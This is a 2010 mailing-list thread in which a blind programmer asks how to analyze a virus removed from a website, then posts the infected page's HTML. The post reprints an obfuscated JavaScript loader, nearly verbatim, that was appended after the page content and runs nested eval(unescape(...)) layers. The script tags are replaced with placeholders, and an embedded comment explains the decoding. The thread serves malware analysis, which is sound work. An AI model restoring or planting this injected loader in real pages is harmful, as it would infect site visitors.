Re: malware analysis

  • From: Jackie McBride <abletec@xxxxxxxxx>
  • To: programmingblind@xxxxxxxxxxxxx
  • Date: Sat, 3 Jul 2010 20:05:29 -0700

This should not execute even in an HTML email client, because I've removed
the <script> & </script> tags and substituted the placeholders StartScript
& EndScript for them; without a script element a browser treats the payload
as inert text. I've also changed some of the links to protect the identity
of the site owner. The malware code, which begins at the StartScript line,
is otherwise unmodified, but note that mail line-wrapping has split several
of its long lines, in places inside quoted strings (e.g. ")));var" followed
by "u7WWvGG" on the next line), so this copy will not run if pasted back
verbatim. Treat it as a live sample all the same: if you want to reconstruct
it, do so offline in a throwaway VM or with a static deobfuscator, never by
restoring the script tags in a browser. Website code, with said
modifications, follows:
<html>

<head>
<title>Brochure Description.</title>
<meta name="generator" content="Namo WebEditor">
</head>

<body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
<p><a href="brochure.txt">Read the Brochure Description.</a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><a href="../pictures/scanner1.jpg" title="Backspace to return to
the Brochure page">Click here to see the image of the scanner.</a></p>
<p><a href="../index.htm">Click here to return to the main page.</a></p>

<!-- Injected payload begins on the next line. The original <script> tag was
     replaced with the placeholder "Startscript" (and </script> with "EndScript")
     so this copy cannot execute; nothing above this comment is part of the
     malware, which was appended after the page's legitimate content.
     What the visible code does: it builds dozens of string fragments in
     randomly named variables, concatenates them out of order, and then each
     layer restores percent-encoding by replacing a marker token (Uc%, X1%, p2p,
     5U) with '%', or a token with a single character (CV% with 'M', jE% with 'C',
     l with '7', MG with '%'), and feeds the result to eval(unescape(...)).
     The outermost layer ends with eval(dDXmwo3A) on the last line; the inner
     layers are only revealed by decoding that string. Some fragments decode to
     HTML (the X1%3C...X1%3E runs spell <body> and </body>), which suggests the
     final stage writes markup into the page, but that stage is not visible
     here; decode it in a sandbox to confirm. Mail line-wrapping has also split
     some string literals across lines (e.g. ")));var" then "u7WWvGG"), so this
     listing is not byte-for-byte the file that was served. -->
Startscript var HZv41="0Uc%70Uc%65";var GvKLQUO="U565U3";var
jmxo="56Uc%32Uc";var bM0s4kK="65X1%6EX";var VEBu9H=")));var
u7WWvGG";var IrujHKMf="cape(VeXTi";var D4yffv="2p27p2p3Bp2p45p";var
f8PbNZny="45Ul05U3A5U2F5";var
M0qRNPX="2p27p2p3";f8PbNZny+="U2F5U665U";var uSEZFp="%6CUc%64";var
Z63uwf3L="2p6Dp2p39";var VMBo="X1%4AX1%";var
aomWLFkN="pe(sVYxD.repla";var IzwRw="75X1%6CX1%6CX";var
Dfpl="%G6ECV%G";var YmEnz0="BUc%62Uc%7AUc%6";var THWVXP="%65X1%6D";var
Sq0sXIq="8Uc%29Uc";var BYWZ61="64X1%6FX1%6";var
UDJ1U="1%69X1%";M0qRNPX="Dp2p27p2p31p"+M0qRNPX;var
LEAFMHeO="7X1%6EX";var uWgM="lace(/5U/g";var
IHW7e="2X1%6DX1%4AX1%2";var kj8q4EDR="X1%4CX1%";var
vfK9="4X1%2EX1%77";var Gh094="1%27X1%6EX1%4A";IHW7e+="7X1%3EX1%3";var
LLKQ="1%22X1%3BX1%";var EKtdBNSm="EX1%27X1%3BX";var
FNc4c="%69X1%76";var
QdyeSQ="2p68p2p2Ep2";Dfpl="%G65CV"+Dfpl;YmEnz0="Uc%6EUc%27Uc%3"+YmEnz0;Sq0sXIq="0Uc%76Uc%6"+Sq0sXIq;bM0s4kK=BYWZ61+"3X1%75X1%6DX1%"+bM0s4kK;var
FiX0XoS="62X1%6FX1%6";var E5x2dsN="2E5U6C5U655U6";var
OVUIGhiv="1%74X1%2EX1%62";Gh094="1%64X1%28X"+Gh094;vfK9="1%6EX1%7"+vfK9;var
aVOu3="1%22X1";var kzAcz1J="62X1%34X";kzAcz1J+="1%75X1%4AX";var
RELt3a="1%62X1%7AX1%";var
Qo2CkEnH="2p65p2p3Dp2";kj8q4EDR="61X1%72X1%20"+kj8q4EDR;bM0s4kK+="1%74X1%2EX1%67X";var
dDXmwo3A="vGG.replace";var bhxk="to='CV%G76CV%";var
IkVX="V%G61CV%";var A1qyC62H="Uc%3DU";var iYkv7M="c%2EUc%";var
KQ2oM="V%G56CV%G32";LLKQ+="69X1%66X1%28X1%";THWVXP+="X1%65X1%6EX1%";var
R4UlrgM="c%2EUc%73Uc%74";var Xpl0="CV%G65CV%G6ECV";var
GDWRD71W="9X1%3B";Qo2CkEnH="2p6Ep2p61p2p6Dp"+Qo2CkEnH;OVUIGhiv="X1%6EX"+OVUIGhiv;var
QDgE5S="V%G65CV";LLKQ="76X1%3EX"+LLKQ;var
Gn1Hf="X1%4AX1%";dDXmwo3A="l(unescape(u7WW"+dDXmwo3A;FNc4c=aVOu3+"%3CX1%64X1"+FNc4c;D4yffv="p3Dp2p27p2p31p"+D4yffv;var
iI37="5Uc%2EUc";LLKQ="1%69X1%"+LLKQ;var
sh0nfd="val(une";Xpl0="G6CCV%G65CV%G6D"+Xpl0;IkVX+="G6DCV%G65CV";var
RA2Xa0C="X1%4AX1%29";FiX0XoS="3CX1%2FX1%"+FiX0XoS;var
aYuQp="2p68p2p65p2";var nH1U="1%63X1%75";var
Chhxqnc="c%6EUc%55Uc";EKtdBNSm+="1%64X1%";RA2Xa0C+="X1%3BX1%76X1";kzAcz1J="4CX1%4AX1%"+kzAcz1J;kj8q4EDR+="4AX1%62X1%34X1%";VEBu9H+="='Uc%45Uc%6";bM0s4kK=RELt3a+"67X1%33X1%3DX1%"+bM0s4kK;var
Bne0Vu="2p50p2p45p2p";IzwRw+="1%29X1%4CX1";var
EqUHdyH="2p32p2p50p";dDXmwo3A+="(/Uc%/";var
PGGTC8G4="%3CX1%62X1%6FX1";IkVX="V%G66CV%G72C"+IkVX;Bne0Vu+="42p2p4Ap2p38p2";var
XOCC="/jE%/g,";var V2GOJW="79X1%3DX";IkVX="8CV%G27CV%G69C"+IkVX;var
RxjaBhHe="nescape(cwM8a.";Sq0sXIq=Chhxqnc+"%56Uc%32Uc%5"+Sq0sXIq;YmEnz0="c%64Uc%64Uc%65"+YmEnz0;var
NxrXgFJ="/CV%/g,'M')";var
CFTN="G6FCV%G6";jmxo=VEBu9H+"EUc%55Uc%"+jmxo;FiX0XoS=kzAcz1J+"1%2BX1%27X1%"+FiX0XoS;PGGTC8G4+="%64X1%79X1%3EX1";XOCC="replace("+XOCC;OVUIGhiv=nH1U+"X1%6DX1%65"+OVUIGhiv;var
hwdh="G72CV%G";Qo2CkEnH=EqUHdyH+"2p76p2p68p2p2Ep"+Qo2CkEnH;EKtdBNSm+="6FX1%63X1%75X";D4yffv="p2p74p2"+D4yffv;vfK9+="X1%72X1%69X1%7";D4yffv=aYuQp+"p69p2p67p2p68"+D4yffv;IkVX=Xpl0+"%G74CV%G2"+IkVX;D4yffv="8p2p2Ep"+D4yffv;iI37+="%76Uc%69Uc%73U";IzwRw+="%4AX1%62X";FNc4c=kj8q4EDR+"75X1%4AX1%3DX"+FNc4c;M0qRNPX="p68p2p3"+M0qRNPX;Gh094="2X1%79X1%49X"+Gh094;var
JQuU22H="56p2p32p2p50p";RxjaBhHe="l5U3B';eval(u"+RxjaBhHe;var
GmdcLH="g,'%')));var c";dDXmwo3A=Sq0sXIq+"%3B';eva"+dDXmwo3A;var
DowPTru="='p2p45p2p6E";f8PbNZny="l5U685Ul45Ul"+f8PbNZny;UDJ1U=FNc4c+"X1%20X"+UDJ1U;IkVX=QDgE5S+"%G45CV%"+IkVX;uWgM=",'7').rep"+uWgM;NxrXgFJ="place("+NxrXgFJ;NxrXgFJ=IrujHKMf+"Xto.re"+NxrXgFJ;OVUIGhiv=LLKQ+"64X1%6FX"+OVUIGhiv;Dfpl=CFTN+"3CV%G75CV%G6DCV"+Dfpl;uWgM=RxjaBhHe+"replace(/l/g"+uWgM;Z63uwf3L="4p2p77p"+Z63uwf3L;EKtdBNSm=FiX0XoS+"4X1%79X1%3"+EKtdBNSm;XOCC+="'C').repla";M0qRNPX+="Bp2p45p2p6";iI37=R4UlrgM+"Uc%79Uc%6CUc%6"+iI37;KQ2oM+="CV%G50CV%G7";PGGTC8G4=Gn1Hf+"3DX1%27X1"+PGGTC8G4;iI37=jmxo+"%50Uc%76Uc%68U"+iI37;iYkv7M=YmEnz0+"7Uc%33U"+iYkv7M;IHW7e="36X1%4"+IHW7e;Gh094+="X1%36X1";Dfpl="G3DCV%G64CV%"+Dfpl;UDJ1U="%76X1%"+UDJ1U;iYkv7M=A1qyC62H+"c%27Uc%68Uc%69U"+iYkv7M;UDJ1U="var
sVYxD='X1"+UDJ1U;JQuU22H=M0qRNPX+"Ep2p55p2p"+JQuU22H;E5x2dsN="5U695Ul45Ul35U"+E5x2dsN;var
M9KCV="c%6CUc%69Uc%7";uSEZFp="%43Uc%68Uc%69Uc"+uSEZFp;bM0s4kK+="1%65X1%74X1";dDXmwo3A=uSEZFp+"Uc%28Uc%45U"+dDXmwo3A;V2GOJW=OVUIGhiv+"X1%6FX1%64X1%"+V2GOJW;E5x2dsN+="D5U6F5U";IkVX="65CV%G61CV%G74C"+IkVX;GmdcLH+="wM8a='5U455U";var
kVenPGu1="5U2E5Ul35Ul25U6";var
OSQgQl="Ull5Ul35U2F5U";GDWRD71W="1%4AX1%27X1%2"+GDWRD71W;Gh094=THWVXP+"74X1%4"+Gh094;var
NPjBLDc="p56p2p32p";f8PbNZny=kVenPGu1+"35U3D5U2"+f8PbNZny;IzwRw=V2GOJW+"1%3DX1%6EX1%"+IzwRw;Dfpl=KQ2oM+"6CV%G68CV%"+Dfpl;uWgM+=",'%')));var
x";Dfpl+="74CV%G2EC";IHW7e=LEAFMHeO+"1%4AX1%"+IHW7e;RA2Xa0C=VMBo+"62X1%34X1%75"+RA2Xa0C;D4yffv=JQuU22H+"2p76p2p6"+D4yffv;hwdh+="20CV%G45CV%";IkVX=Dfpl+"V%G63CV%G72CV%G"+IkVX;iYkv7M=M9KCV+"4Uc%79"+iYkv7M;IkVX=hwdh+"G6ECV%G55C"+IkVX;EKtdBNSm=PGGTC8G4+"%27X1%2BX1%"+EKtdBNSm;dDXmwo3A+="g,'%')))";GvKLQUO=GmdcLH+"6E5U555"+GvKLQUO;DowPTru=uWgM+"sMZ5Nj1"+DowPTru;sh0nfd=Z63uwf3L+"p2p27p2p3B';e"+sh0nfd;bM0s4kK=RA2Xa0C+"%61X1%72X1%20X"+bM0s4kK;Qo2CkEnH=D4yffv+"2p6Ep2p55p2p56p"+Qo2CkEnH;sh0nfd=Bne0Vu+"p47p2p4jE%p2p5"+sh0nfd;vfK9+="4X1%65X1%20X1";IkVX=bhxk+"G61CV%"+IkVX;NPjBLDc=DowPTru+"p2p55p2"+NPjBLDc;Gh094=bM0s4kK+"%45X1%6CX1"+Gh094;dDXmwo3A+=";";E5x2dsN=f8PbNZny+"l25Ul5"+E5x2dsN;IHW7e=UDJ1U+"64X1%3DX1%2"+IHW7e;aomWLFkN=GDWRD71W+"';eval(unesca"+aomWLFkN;aomWLFkN=Gh094+"%42X1%6DX"+aomWLFkN;aomWLFkN+="ce(/X1%/g,'%";E5x2dsN=GvKLQUO+"25U505Ul65U68"+E5x2dsN;IkVX=aomWLFkN+"')));var
VeXTiX"+IkVX;XOCC=sh0nfd+"scape(xsMZ5Nj1."+XOCC;IkVX=vfK9+"%28X1%4C"+IkVX;dDXmwo3A=HZv41+"Uc%6EUc%64Uc"+dDXmwo3A;IzwRw=IHW7e+"CX1%2FX1%64X"+IzwRw;Qo2CkEnH="9p2p64p2p74p2"+Qo2CkEnH;IkVX+="%G27CV%G29CV";EKtdBNSm=IzwRw+"1%34X1%75"+EKtdBNSm;NxrXgFJ=IkVX+"%G3B';eval(unes"+NxrXgFJ;dDXmwo3A=iYkv7M+"61Uc%7"+dDXmwo3A;XOCC=Qo2CkEnH+"p27p2p44p"+XOCC;QdyeSQ=NPjBLDc+"2p50p2p76p"+QdyeSQ;iI37=XOCC+"ce(/p2p/g,'%'"+iI37;E5x2dsN=NxrXgFJ+".replace(/MG/"+E5x2dsN;dDXmwo3A=iI37+"c%69Uc%62Uc%69U"+dDXmwo3A;dDXmwo3A=QdyeSQ+"p77p2p6"+dDXmwo3A;OSQgQl=E5x2dsN+"6E5U695U615U2E5"+OSQgQl;OSQgQl=EKtdBNSm+"1%6DX1%65X"+OSQgQl;dDXmwo3A=OSQgQl+"545U625U6C5U2"+dDXmwo3A;eval(dDXmwo3A);
EndScript
</body>

</html>

On 7/3/10, Dave <davidct1209@xxxxxxxxx> wrote:
> At initial read of your message, it sounds like a cross-site scripting
> attack.  I'm not aware of any browser that runs binary code within
> script tags, so I'm not sure what that is, since XSS attacks usually
> inject JavaScript that runs in the user's security context.
>
> On 7/3/10, Jackie McBride <abletec@xxxxxxxxx> wrote:
>> Hay, yall:
>>
>> I was just thinkin (& that's always dangerous for me), but, now that
>> I've come out of my lurking hole, perhaps I'll keep my head out just a
>> bit longer & ask this. I hammered a virus off of a website the other
>> day. For whatever reason, it got my curiosity up, & I was rather
>> wondering exactly what its code does. So: any1 got any ideas of how to
>> analyze that? It looked like a compiled script (at least there were
>> <script> </script> tags), but between those tags was output that one
>> would associate with a binary file.
>>
>> I sure would like to know precisely what it does. I'm also surprised
>> that out of several AV apps I tested, the only one to pick it up was
>> Avast. Still, I know it did not belong in that site, given the source
>> of the other, uninfected pages I saw on the same site.
>>
>> --
>> Change the world--1 deed at a time
>> Jackie McBride
>> Scripting Classes: http://jawsscripting.lonsdalemedia.org
>> homePage: www.abletec.serverheaven.net
>> For technophobes: www.technophoeb.com
>>
>>
>
>


-- 
Change the world--1 deed at a time
Jackie McBride
Scripting Classes: http://jawsscripting.lonsdalemedia.org
homePage: www.abletec.serverheaven.net
For technophobes: www.technophoeb.com
